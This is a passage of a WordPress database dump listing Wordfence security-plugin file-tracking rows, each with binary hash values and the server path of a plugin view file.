('T?„?:q×®PÃóah''««', 'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µºˆANðX[`h\0ªç¡»', '£"xI¦B6šE?‡éÉÄìiŠ''26Ì5y/™¦', '', 0, '?'),
('N¡d#R­‡+«Ár\0s[', 'wp-content/plugins/wordfence/views/reports/activity-report.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/reports/activity-report.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÒŽ?ueÓwD•:ž¬Eî', 'ê°ÃÎ¶ˆ\ZàÞ)v¢µÕvGïŸ,éhü/—Óˆ„', '', 0, '?'),
('p{\r¶¨ â%>/üZÿë:', 'wp-content/plugins/wordfence/views/scanner/issue-base.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-base.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‚8Ï¼¨çgó v5‡aS³*', 'NØõÒ.“åÁ0·-?s÷Ð?ÖÙ,Ññ¨ßŸÒ`ƒ.B', '', 0, '?'),
('Ü‘KâÝ“à¥ÉÐ%eP¾^U', 'wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'g³}Ùhšk9ñyb©(W', '¥úÙ\ZD“üQà^‹ý\\¡–£ì9›£;Û7v¢çFË', '', 0, '?'),
('þ%|Ý½°>?v{jÊ·', 'wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'VÄß=àl¬àï	2âXÿ•', '×´µ0ËÊªM"—¹r,_ÑÆŽ>)G”þÍñéwg?', '', 0, '?'),
('ep\r}Èu_4ý¿‘±ó–Ÿ', 'wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ð©3®^7‡DPk¾@c_›l', 'e½ž½­ê× cã1°¾0FÇê^Êb¼ÕBÚQ@Buª¢', '', 0, '?'),
('DÌöÉuš\rÅÂ‹ˆÉ²\Z', 'wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'AÕ«û»–ÞÅ LqwÖ	ƒ', '˜²rŸ_¶iQÖ	ŒaÀîR¿¦Œ‚ÔË+‚íí‘Ø', '', 0, '?'),
('ïô±¨cµÐG¼¶¸(`E»•', 'wp-content/plugins/wordfence/views/scanner/issue-configReadable.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-configReadable.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ä¼\r¶®\0lp_Ñ€>â#', '¦­¦»T,¦Ú}1waïYïøà²ß4BI]wAXÛµŒÚ', '', 0, '?'),
('$èï”|©¨cØ¿ \\~Žõ', 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£\\Ë^>ƒ5±pa‘ÆW½î>', '§ô‘ÌÒ“¤éÝDCÉìXG4WFP·#ÞN¹S\Z', '', 0, '?'),
('èSHLenPîq7¾Ä‰', 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'f‡î‹´Ž`çj|£yþ', 'iú†OGi„¥•F|4 8Ú™Vñ×jî\n#V-L', '', 0, '?'),
('®»Î¦Hcñ^žâû°)', 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '®†­ØÝâ''á{=Íº', '†–ïR¡¹³“÷Ç_fW{*3•Åê±ÅÝ”	±"Ë/', '', 0, '?'),
('º(dwI\0:\rÎÀ×Xx1DC', 'wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•vÌòÁ[ý¥A.F3Dã', '@– Ú“‹VÓCñ²+ùé´<!;@8ŠÀ§9Ð(ón=»G', '', 0, '?'),
('´•''ˆ‹@S Ç÷Dá’š ', 'wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'U±¤?ëq>ÿ@áª×p', '\0{aqî(wÏ!Izó}+lÿx/I0¸9|1%¡øÀ¼', '', 0, '?'),
(')Ø6#¦_ÅúñÌŸSAF¦', 'wp-content/plugins/wordfence/views/scanner/issue-control-repair.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-repair.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9œg¦ÿs¤ ž­å`Và', 'žõj(¼©ô”Ø \r	ç·ª›·ë”U+ÎòÉ.ó®d', '', 0, '?'),
('Úu78¾Â¸äKÔŠkhî', 'wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'étJÖ¶•DÜ’¾+ÿC', 'ë¬ô"uužgˆI$E¯…®D=Ðð¿\nºž·Q³‚g-ìTZ', '', 0, '?'),
('eÇìÌXÇŒ.\\ì(&ýd', 'wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ôaŽ…4¹³P^/ùö7éEú', 'Ñ§\n7YõGÄ¢j*þD_.Ó÷¡è™~CžÉbÞ', '', 0, '?'),
('‘/«Ò0)­ºœ\Zæ«', 'wp-content/plugins/wordfence/views/scanner/issue-database.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-database.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Š†S±Ð>”ˆ«ZààÅîGä', '„’ñ\n«‡#Pw3IdÎÈ}Í‡%÷JÕÏì‡j™U¢Ó+', '', 0, '?'),
('XýÉ˜y_ñ7¥XN/', 'wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ç\\hÏè¤”''\nä·º', ' ”7ßÜRGë$/Á‡Íæ-i®ÝNm(ÎWØ;Ì…', '', 0, '?'),
('4\n‘”	m‡]Ä¿±ÐŠŠÌ', 'wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!ï«ó¼{\\Å däÂãÝ` ', 'ç•ë³Ç¿''äÉœ¬LÒª¥B> Ýñ	&-¥{…', '', 0, '?'),
('§ßV€³t¿Sù-Þº', 'wp-content/plugins/wordfence/views/scanner/issue-file.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-file.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '®xõÐÌJZËãôÝô', '*ÈÒŸí‡èãbÎãÃÏå\\ãökpµBíñS3ÜÓò*', '', 0, '?'),
('¢;¹f J1øúË˜·€+C', 'wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‘n\níÚ+Õ®.jqAZ¨', '„\0ýöIˆ›ùƒˆ’36˜ø³Ä›nüj7jk£:ãá', '', 0, '?'),
('BžûõQÁ¢ÓaUÿ%', 'wp-content/plugins/wordfence/views/scanner/issue-knownfile.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-knownfile.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'RšüˆÕ…“-¸e_—ü›', '™–3?<P0\r²^æÏ„ öXˆ` •ât{í#øŒ', '', 0, '?'),
('±‹weÖöi!<º¡súy\n', 'wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'øh8¥FK¥3EqŸsù å', 'Ñ0T›û—E÷Va~''55h4‘ÁoÕžˆ{MÉ±Ëð''', '', 0, '?'),
('Êã±›™‹­ V9ø{â¶éb', 'wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~¹ñJnwÍæ8z2óswa', 'œu<üOñ8Be''O¯b\0yŽPJÒx7˜çþÜÿIó', '', 0, '?'),
('ì¹Ú!<üÜÓB4\ZS}', 'wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ªÉÏþªÌleÞ@1˜Ù-°', '¦ª+	[P\rªi-ÊÂb0m–ŸºÃÆ¥¿M"…#³¤@', '', 0, '?'),
(' úà\nî#T¨ê?×»ìË', 'wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6ñÎ×þ@E-í­mdo', 'Ì‰Y¶âj''õ¤i¹)j|EÍVê†¸ŠlÉF\n¯Lì', '', 0, '?'),
('ÓH Š%9ÝÞÕl¶Ô…”E', 'wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷Á¨ˆZðÚ|JSÊóçœ', 'Á—¹¯i\\éJkFóÓt\\ó\0xßÉReñheÁ&j¼', '', 0, '?'),
('n[	X”‡ƒ}É0‚', 'wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'LL’#ÃÅ\0‡uD,ÑYþi]', '®~^ôÏÍÙ´Õ	d·íi*ÐŽ˜ÌW„õ‹ß<6ô¯Æ', '', 0, '?'),
('$7yûÈÇ]ÚØðNù', 'wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í©ç…pm¥ö<æj@¨Î''', '×ÄŠ8àÿ§Ü,•óÕQwöGðn a{¯¨£G9éˆD', '', 0, '?'),
('$šèSÁCkèô‰dÎWû', 'wp-content/plugins/wordfence/views/scanner/issue-timelimit.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-timelimit.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ø!í‰å"¥»V%		|', 'öX>‡Úïœ[6_ã\\—æµa·3›÷ÉÐséV', '', 0, '?'),
('dÃ0ÀÙ·\ZÉÇèóðÔŒn', 'wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'üÜù0<N5Ò–oèôãuM', 'pô"\r‰³¯<Ò¡P13ùr£°zîÕÒ=××ÈâÆ“]', '', 0, '?'),
('æé¼"ŒLJ1ìC4ND÷', 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Íp»ò+X-;ß¨yŽD°j', '|º\\õv¨Gøå>Èç©×´KïW@ßÑöMR“ÀQ€Q…Î', '', 0, '?'),
('=ãFÓí˜£·Ã†±ÂK&Š', 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3|xw£ÛJ˜ìuTòVß', 'òÖiŸØ,õÂ0ÓŒ·@hz<RQwK¾dhª"', '', 0, '?'),
('Ú,\ržÊ	ÕgÎHÅþ6', 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×ê8v\n—Øeÿ=Ü\r+', '¼´žo!#0á`¡BÚ¡ýˆÀ`¹íêRúÝ–ÎÏ&##TF', '', 0, '?'),
('È;±°”N¼Q>ã‰Äô¨', 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'v@¨Þ—Ö™š8¦:(', 'DkœfŽ}“{gßù%y÷¿ª=3Vf»h«)¤nqTx', '', 0, '?'),
('îˆrJÿ<p>§úÃÄZ–', 'wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'o½ÿ¦\\‰Ê2b¾,RØÙÏ', 'ÈÊ¦w;2àgš/åÓ	¾o(@¼\Z‘ïµ«½>Ø½sÚ;', '', 0, '?'),
('|÷¸T]º‡:Y$=''hº', 'wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÅÈã­Û*B>	ƒÝC»rÍg', 'h$V<¢`ùX)˜,ã¬á«‘I\nDâ‚X,yßØž', '', 0, '?'),
('Zd‡Ÿ‡¾kLØñ“ÅŸìT', 'wp-content/plugins/wordfence/views/scanner/issue-wfUpgradeError.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfUpgradeError.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'îtø5ä–<7´Ú^AÝnr•', 'ækÙÑ+QÈºÁFÞ4ƒ¤ÿ/røˆÄ³õX³ÿÞüj¢5í', '', 0, '?'),
('çÚÝL³.dDvìù', 'wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',–&›1{è\04ªHØž,Í', '+Ó=¨ùŸÄþÞÜÉ±[2¶È©~¿<oªchÎþ', '', 0, '?'),
('ÑmaõvMvŸKó³¥\Z', 'wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'êö ’2%\\½¹¸&"PÀ', 'Ü6_]Wü•>VXv¶ðB„æÓ¾¸uáK$Þ°9þ|]E\r', '', 0, '?'),
('£z²h9æÇêˆ¦ÄÊXpˆ+', 'wp-content/plugins/wordfence/views/scanner/no-issues.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/no-issues.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'xt-|øFÞýŽ¨ÐÑé…eª', 'É×_?7ËñÜcõŒ¯:_˜Ò@¨‹ÃEÛJ‰Ÿs©°[', '', 0, '?'),
('Úô“ðC .yj\0oì*úf¹', 'wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÁL\Z3`f§ŠÑ–{_z©q', ' .IET°ÚØ£µ«J#ÕJðUkÃ7úhy›Ò\\û0ˆ', '', 0, '?'),
('sò‹«As”Y¼ºø¸D]', 'wp-content/plugins/wordfence/views/scanner/options-group-advanced.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/options-group-advanced.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ðã(û_¸¦©0tKG`C', '&I¤Taôw0^}ºuT:·Å]÷F­€vB+Žò', '', 0, '?'),
('e}0wTnv_óg§~', 'wp-content/plugins/wordfence/views/scanner/options-group-basic.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/options-group-basic.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'VEƒgOº`#jVÔ4§C|', 'Ðs«c‡ñ	;¦ƒ*r3$X¸‰÷öG8Í¬RKÇ', '', 0, '?'),
('‘ÜNTZt¿o\r–%²¯F', 'wp-content/plugins/wordfence/views/scanner/options-group-general.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/options-group-general.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'tLëGa¸\0ÝoÒ bY', '2 6‰þlìn\rðñ"¨ c¿:ÓÆ…zè¤vôJ1Ü¶ßò', '', 0, '?'),
('ù Å„1šr}mJGWßR¨Ù', 'wp-content/plugins/wordfence/views/scanner/options-group-performance.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/options-group-performance.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'öàõPÀ=ÝPÒ¤­ÖÓ ', 'Æ-9þ›\0tÏÊD\\6¤9s]² \\e\0R²r¼ƒñ', '', 0, '?'),
('üšlxyý\ZÂùÔÄ"–‘', 'wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'EU.7®ÄïñH>išà;Å', '™Ó,åò+x>¯Ì× VˆŽý7r™LKs&Š¶GíŽ', '', 0, '?'),
('µ<Ÿ3ì†v¢&F', 'wp-content/plugins/wordfence/views/scanner/scan-failed.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-failed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '}\\§¾fD¤|2ÜÀ¨u…', '÷þ¥–¯¤3ÅùC‘¨à&iˆÌ8Ê9MgoÔApzoø@', '', 0, '?'),
('žµ‚´„Õ°	Ì‹ÓÈ²ÃS', 'wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '€”(`]VŽÅ£[^ Ïò3', 'FÜ‘ t=Y+‹YÊÒ¿æeÆÛ¾K÷bÇ6Wåó', '', 0, '?'),
('³|]§DÅó\Z.’Eî±®', 'wp-content/plugins/wordfence/views/scanner/scan-progress-element.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-progress-element.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'D¶ê«¯üyï•5æpc', '0(ú¦5D²=UŸïÔ”~éØÚˆI")á¥7h', '', 0, '?'),
('Þp«Õ­^ß@#àÔ’', 'wp-content/plugins/wordfence/views/scanner/scan-progress.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-progress.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'b·1{ê	@õmŸ90', 'ïKªÊM$®ã)+SCQF 1qZéTv`í»r', '', 0, '?'),
('''ÚÀ¿_iYm1ÁR', 'wp-content/plugins/wordfence/views/scanner/scan-results.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-results.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'qxM!’ò£\nB½Š+=LØ', ';ªOÒ¥vìÏÌÌ‰þ¯™Ø	ÏÊþ¶æ\n„Ÿõ¶', '', 0, '?'),
('ñÆ4‘ìïÛ$êŽª', 'wp-content/plugins/wordfence/views/scanner/scan-scheduling.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-scheduling.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ö&©J¤þHNÄïÔ‘', 'rªh,Ð˜QÃUçÓ2 Vñ†J¸„à6}N''3ÙiuK', '', 0, '?'),
('†F_q¡ÃÈCŠF!o4p·—', 'wp-content/plugins/wordfence/views/scanner/scan-starter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-starter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1õìxø¦ýÀh3\\', '¦ÑUØ~–žAVkrìº%R’x$p¨«Z1°"ÒU¤', '', 0, '?'),
('ÀDˆÿ!VD+“óêë', 'wp-content/plugins/wordfence/views/scanner/scan-type.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-type.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'N½V†³Â	¯9çJ·', 'ÖƒáÏhbfõ#æðÐ‚‡ÚOEéíRÝâþ¿ž9H\r', '', 0, '?'),
('KKOfºSd«iB0Ovóê', 'wp-content/plugins/wordfence/views/scanner/scanner-status.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scanner-status.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2ú±·ë´øvÇïœtí', 'Íí9¥Øë›`NŒ>Éžõ9:¿ŒAÚÓË\0ŽÕL…“–˜', '', 0, '?'),
('©¬³ô‘9Ä~\0{@ÙÛò', 'wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Â®«…óuMº—¤¹×', '¤JEz•¤»ˆÙ™6Àžÿ­¼Õ)P§û)÷Ã\0ŽÃ', '', 0, '?'),
('&#ÙpªJ£¨há', 'wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3œÄŒd<v­¥WJìmÓx', '6¯ÖR3•»]iJ)o”õà.gÉ1Î&ã¶lJ…ø"„¿', '', 0, '?'),
('o}ÛCÜŠ8ôEøïGð', 'wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'E8ëñuÅChG<ÛoÜ…"', 'þTQÇétûÝêÝ“±¢zØÏ‰T¹ú0ÆõA', '', 0, '?'),
('ÅŠ³÷6ƒ÷½@àL(`öâ', 'wp-content/plugins/wordfence/views/scanner/site-cleaning.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/site-cleaning.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\²!ß´_²&xh£•G', 'l¿t–œ!oÊVLÃþ`Í‚eÜ¶ã<·¬`ë', '', 0, '?'),
('mÔÃ±…~–öòR¥?', 'wp-content/plugins/wordfence/views/tools/options-group-2fa.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/tools/options-group-2fa.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'o¤êÇ\n2‘ƒè0·êôø\0', 'aGÏÖ´\nOkø&1•“ä`3ƒ*¿‰Ò¿fÓ™é_Wï', '', 0, '?'),
('ƒãj¬ºÓÃ5²ÞfÅj¡', 'wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÔÖB±ýÁ”æØŽîS’-', 'äÝéR«@@¬lQõFÜƒ''(mÝ¨^znwnxqÃO¦[', '', 0, '?'),
('¾/=ï+HhEÑÞ14ÓÊ†¥', 'wp-content/plugins/wordfence/views/tours/login-security.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/tours/login-security.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›PÉ–¬µØ3TØ±#…', '>ãˆ³ecÃÂ¯f4sØ7©8ý·á#G‚`þxžµ0–‰', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('V#7A”‚¨²þ@ë?÷øû)', 'wp-content/plugins/wordfence/views/unsupported-php/admin-message.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/unsupported-php/admin-message.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'îA	©H™RQ‰~', 'j«ZÆúø=8<Áÿ½OÒÔcã-R=s.×)4Æƒ', '', 0, '?'),
('<YDØ-‚AØ''Þ|)àÝé', 'wp-content/plugins/wordfence/views/user/disabled-application-passwords.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/user/disabled-application-passwords.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '%tí®Z)åâ™ŸÇ÷V¡', 'šñGÍŒÑr†A{èü\r`\rYë²ø•÷}~h™ÌJd¿', '', 0, '?'),
('Ö‹Ë8“[½À¦‰˜0½ÊŠ', 'wp-content/plugins/wordfence/views/waf/debug.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/debug.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ûAöN™¯z‘ðÌ	Ü¿œ', 'Å—”5‰£bDGˆ!‹âÍÞ{t¶*"ŸýÈy»', '', 0, '?'),
('ËyÐ6‘6lëšM¬C·', 'wp-content/plugins/wordfence/views/waf/firewall-status.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/firewall-status.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ýëûØÅð¸SÓ4,=³tP', 'Þâ-.\\zo¥Ö‘úÊˆgç¤mP¤PíR§.Ò$ï', '', 0, '?'),
('è¨Ã·‘g$ë”õMâsß', 'wp-content/plugins/wordfence/views/waf/option-rate-limit.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/option-rate-limit.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'E,bÙ¿ÊŠ•N¹þE\\', '|JÜÚ\Z^(á–•£™×Œ»xDsXâ¡å8Ûèˆ?ÈR', '', 0, '?'),
